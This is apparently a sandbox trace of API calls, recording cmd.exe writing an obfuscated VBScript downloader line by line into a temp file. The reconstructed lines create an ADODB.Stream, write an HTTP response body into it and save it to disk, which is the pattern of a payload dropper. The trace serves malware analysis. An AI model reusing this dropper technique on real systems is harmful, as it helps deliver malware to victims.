[0083.934] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.934] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.934] GetFileType (hFile=0x1c) returned 0x1
[0083.934] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a9
[0083.934] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39ee4c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39ee4c*=0) returned 0x2a8
[0083.934] ReadFile (in: hFile=0x1c, lpBuffer=0x39ee44, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39ee40, lpOverlapped=0x0 | out: lpBuffer=0x39ee44*, lpNumberOfBytesRead=0x39ee40*=0x1, lpOverlapped=0x0) returned 1
[0083.934] GetConsoleTitleW (in: lpConsoleTitle=0x39ec64, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.935] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39ec2c | out: _Buffer="Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") \r\n") returned 99
[0083.935] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.935] GetFileType (hFile=0x1c) returned 0x1
[0083.935] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.935] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") \r\n", lpUsedDefaultChar=0x0) returned 100
[0083.935] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x39ec18, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39ec18*=0x63, lpOverlapped=0x0) returned 1
[0083.935] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0083.935] _close (_FileHandle=3) returned 0
[0083.936] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.936] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.936] _get_osfhandle (_FileHandle=1) returned 0x7
[0083.936] GetFileType (hFile=0x7) returned 0x2
[0083.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0083.936] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39eda0 | out: lpMode=0x39eda0) returned 1
[0083.936] _dup (_FileHandle=1) returned 3
[0083.936] _close (_FileHandle=1) returned 0
[0083.937] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0083.937] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39ed70, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0083.937] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0083.937] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.937] GetFileType (hFile=0x1c) returned 0x1
[0083.937] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30c
[0083.937] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39ed88*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39ed88*=0) returned 0x30b
[0083.937] ReadFile (in: hFile=0x1c, lpBuffer=0x39ed80, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39ed7c, lpOverlapped=0x0 | out: lpBuffer=0x39ed80*, lpNumberOfBytesRead=0x39ed7c*=0x1, lpOverlapped=0x0) returned 1
[0083.937] GetConsoleTitleW (in: lpConsoleTitle=0x39eba0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0083.938] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39eb68 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open \r\n") returned 69
[0083.938] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.938] GetFileType (hFile=0x1c) returned 0x1
[0083.938] _get_osfhandle (_FileHandle=1) returned 0x1c
[0083.938] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open \r\n", lpUsedDefaultChar=0x0) returned 70
[0083.938] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x39eb54, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39eb54*=0x45, lpOverlapped=0x0) returned 1
[0083.938] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.062] _close (_FileHandle=3) returned 0
[0084.063] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.063] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.063] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.063] GetFileType (hFile=0x7) returned 0x2
[0084.063] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.063] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39ecdc | out: lpMode=0x39ecdc) returned 1
[0084.063] _dup (_FileHandle=1) returned 3
[0084.063] _close (_FileHandle=1) returned 0
[0084.064] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.064] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39ecac, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.064] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.064] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.064] GetFileType (hFile=0x1c) returned 0x1
[0084.064] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x351
[0084.064] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39ecc4*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39ecc4*=0) returned 0x350
[0084.064] ReadFile (in: hFile=0x1c, lpBuffer=0x39ecbc, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39ecb8, lpOverlapped=0x0 | out: lpBuffer=0x39ecbc*, lpNumberOfBytesRead=0x39ecb8*=0x1, lpOverlapped=0x0) returned 1
[0084.064] GetConsoleTitleW (in: lpConsoleTitle=0x39eadc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.065] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39eaa4 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 \r\n") returned 73
[0084.065] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.065] GetFileType (hFile=0x1c) returned 0x1
[0084.065] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.065] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 \r\n", lpUsedDefaultChar=0x0) returned 74
[0084.065] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x39ea90, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39ea90*=0x49, lpOverlapped=0x0) returned 1
[0084.065] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.065] _close (_FileHandle=3) returned 0
[0084.066] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.066] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.066] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.066] GetFileType (hFile=0x7) returned 0x2
[0084.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.066] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39ec18 | out: lpMode=0x39ec18) returned 1
[0084.066] _dup (_FileHandle=1) returned 3
[0084.066] _close (_FileHandle=1) returned 0
[0084.067] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.067] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39ebe8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.067] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.067] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.067] GetFileType (hFile=0x1c) returned 0x1
[0084.067] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39a
[0084.067] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39ec00*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39ec00*=0) returned 0x399
[0084.067] ReadFile (in: hFile=0x1c, lpBuffer=0x39ebf8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39ebf4, lpOverlapped=0x0 | out: lpBuffer=0x39ebf8*, lpNumberOfBytesRead=0x39ebf4*=0x1, lpOverlapped=0x0) returned 1
[0084.067] GetConsoleTitleW (in: lpConsoleTitle=0x39ea18, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.067] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e9e0 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody \r\n") returned 111
[0084.067] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.067] GetFileType (hFile=0x1c) returned 0x1
[0084.067] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.067] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody \r\n", lpUsedDefaultChar=0x0) returned 112
[0084.067] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x39e9cc, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e9cc*=0x6f, lpOverlapped=0x0) returned 1
[0084.068] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.068] _close (_FileHandle=3) returned 0
[0084.068] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.068] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.068] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.068] GetFileType (hFile=0x7) returned 0x2
[0084.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39eb54 | out: lpMode=0x39eb54) returned 1
[0084.069] _dup (_FileHandle=1) returned 3
[0084.069] _close (_FileHandle=1) returned 0
[0084.069] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.069] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39eb24, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.069] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.069] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.069] GetFileType (hFile=0x1c) returned 0x1
[0084.069] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x409
[0084.069] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39eb3c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39eb3c*=0) returned 0x408
[0084.069] ReadFile (in: hFile=0x1c, lpBuffer=0x39eb34, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39eb30, lpOverlapped=0x0 | out: lpBuffer=0x39eb34*, lpNumberOfBytesRead=0x39eb30*=0x1, lpOverlapped=0x0) returned 1
[0084.069] GetConsoleTitleW (in: lpConsoleTitle=0x39e954, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.070] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e91c | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 \r\n") returned 77
[0084.070] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.070] GetFileType (hFile=0x1c) returned 0x1
[0084.070] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.070] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 \r\n", lpUsedDefaultChar=0x0) returned 78
[0084.070] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x39e908, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e908*=0x4d, lpOverlapped=0x0) returned 1
[0084.070] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.070] _close (_FileHandle=3) returned 0
[0084.071] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.071] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.071] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.071] GetFileType (hFile=0x7) returned 0x2
[0084.071] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39ea90 | out: lpMode=0x39ea90) returned 1
[0084.071] _dup (_FileHandle=1) returned 3
[0084.071] _close (_FileHandle=1) returned 0
[0084.071] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.071] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39ea60, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.072] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.072] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.072] GetFileType (hFile=0x1c) returned 0x1
[0084.072] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x456
[0084.072] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39ea78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39ea78*=0) returned 0x455
[0084.072] ReadFile (in: hFile=0x1c, lpBuffer=0x39ea70, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39ea6c, lpOverlapped=0x0 | out: lpBuffer=0x39ea70*, lpNumberOfBytesRead=0x39ea6c*=0x1, lpOverlapped=0x0) returned 1
[0084.072] GetConsoleTitleW (in: lpConsoleTitle=0x39e890, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.072] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e858 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 \r\n") returned 115
[0084.072] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.072] GetFileType (hFile=0x1c) returned 0x1
[0084.072] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.072] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 \r\n", lpUsedDefaultChar=0x0) returned 116
[0084.072] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x73, lpNumberOfBytesWritten=0x39e844, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e844*=0x73, lpOverlapped=0x0) returned 1
[0084.072] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.073] _close (_FileHandle=3) returned 0
[0084.073] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.073] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.073] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.073] GetFileType (hFile=0x7) returned 0x2
[0084.073] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.073] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39e9cc | out: lpMode=0x39e9cc) returned 1
[0084.073] _dup (_FileHandle=1) returned 3
[0084.074] _close (_FileHandle=1) returned 0
[0084.074] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.074] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39e99c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.074] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.074] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.074] GetFileType (hFile=0x1c) returned 0x1
[0084.074] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4c9
[0084.074] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39e9b4*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39e9b4*=0) returned 0x4c8
[0084.074] ReadFile (in: hFile=0x1c, lpBuffer=0x39e9ac, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39e9a8, lpOverlapped=0x0 | out: lpBuffer=0x39e9ac*, lpNumberOfBytesRead=0x39e9a8*=0x1, lpOverlapped=0x0) returned 1
[0084.074] GetConsoleTitleW (in: lpConsoleTitle=0x39e7cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.074] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e794 | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close \r\n") returned 70
[0084.074] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.074] GetFileType (hFile=0x1c) returned 0x1
[0084.074] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.074] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close \r\n", lpUsedDefaultChar=0x0) returned 71
[0084.075] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x39e780, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e780*=0x46, lpOverlapped=0x0) returned 1
[0084.075] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.075] _close (_FileHandle=3) returned 0
[0084.075] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.075] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.075] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.075] GetFileType (hFile=0x7) returned 0x2
[0084.075] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.075] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39e908 | out: lpMode=0x39e908) returned 1
[0084.076] _dup (_FileHandle=1) returned 3
[0084.076] _close (_FileHandle=1) returned 0
[0084.076] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.076] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39e8d8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.076] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.076] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.076] GetFileType (hFile=0x1c) returned 0x1
[0084.076] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50f
[0084.076] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39e8f0*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39e8f0*=0) returned 0x50e
[0084.076] ReadFile (in: hFile=0x1c, lpBuffer=0x39e8e8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39e8e4, lpOverlapped=0x0 | out: lpBuffer=0x39e8e8*, lpNumberOfBytesRead=0x39e8e4*=0x1, lpOverlapped=0x0) returned 1
[0084.076] GetConsoleTitleW (in: lpConsoleTitle=0x39e708, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.077] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e6d0 | out: _Buffer="Set nE= Nothing \r\n") returned 19
[0084.077] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.077] GetFileType (hFile=0x1c) returned 0x1
[0084.077] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.077] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Set nE= Nothing \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Set nE= Nothing \r\n", lpUsedDefaultChar=0x0) returned 20
[0084.077] WriteFile (in: hFile=0x1c, lpBuffer=0x4ab56640*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x39e6bc, lpOverlapped=0x0 | out: lpBuffer=0x4ab56640*, lpNumberOfBytesWritten=0x39e6bc*=0x13, lpOverlapped=0x0) returned 1
[0084.077] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0084.077] _close (_FileHandle=3) returned 0
[0084.078] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.078] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.078] _get_osfhandle (_FileHandle=1) returned 0x7
[0084.078] GetFileType (hFile=0x7) returned 0x2
[0084.078] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0084.078] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x39e844 | out: lpMode=0x39e844) returned 1
[0084.078] _dup (_FileHandle=1) returned 3
[0084.079] _close (_FileHandle=1) returned 0
[0084.079] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0084.079] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x39e814, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0084.079] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0084.079] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.079] GetFileType (hFile=0x1c) returned 0x1
[0084.079] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x522
[0084.079] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x39e82c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x39e82c*=0) returned 0x521
[0084.079] ReadFile (in: hFile=0x1c, lpBuffer=0x39e824, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x39e820, lpOverlapped=0x0 | out: lpBuffer=0x39e824*, lpNumberOfBytesRead=0x39e820*=0x1, lpOverlapped=0x0) returned 1
[0084.079] GetConsoleTitleW (in: lpConsoleTitle=0x39e644, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0084.080] _vsnwprintf (in: _Buffer=0x4ab64640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x39e60c | out: _Buffer="End If \r\n") returned 10
[0084.080] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.080] GetFileType (hFile=0x1c) returned 0x1
[0084.080] _get_osfhandle (_FileHandle=1) returned 0x1c
[0084.080] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="End If \r\n", cchWideChar=-1, lpMultiByteStr=0x4ab56640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="End If \r\n", lpUsedDefaultChar=0x0) returned 11
